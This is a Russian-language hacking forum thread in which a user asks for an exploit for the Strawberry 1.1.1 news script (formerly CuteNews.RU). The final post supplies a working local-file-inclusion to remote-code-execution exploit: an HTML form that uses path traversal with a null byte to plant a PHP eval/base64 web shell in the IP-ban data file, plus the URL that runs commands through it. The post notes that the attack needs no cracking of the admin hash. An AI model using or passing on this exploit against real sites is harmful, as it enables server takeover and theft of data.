Есть ли сплоит для Strawberry 1.1.1 ?

Discussion in 'Песочница' started by Nosferatu, 18 Oct 2006.

  1. Nosferatu

    Nosferatu New Member

    Joined:
    15 Oct 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Народ,пожалуйста помогите найти сплоит для Strawberry 1.1.1, или хотябы описание уязвимостей....
     
  2. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    Если я неправ поправьте.
    Это названия версии движка было недавно переминовано с CuteNews на Strawberry.

    Strawberry
    Теперь новостной скрипт CuteNews.RU называется Strawberry!
     
  3. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Нет...ты не ошибаешься...все именно так...
     
  4. [AVT]

    [AVT] Member

    Joined:
    20 Dec 2007
    Messages:
    36
    Likes Received:
    15
    Reputations:
    1
    StrawBerry 1.1.1 LFI / Remote Code Execution Exploit

    Развивая тему _/showpost.php?p=953944&postcount=71

    Выполняем POST-запрос:
    Code:
    <form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00">
    <input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>">
    <input type="hidden" name="action" value="add">
    <input type="hidden" name="mod" value="ipban">
    <input type="submit" value="First time">
    </form>
    
    Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00

    + Не нужно расшифровывать md5(md5()) хеш админа.

    Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.
     
    #4 [AVT], 10 May 2009
    Last edited: 10 May 2009
    2 people like this.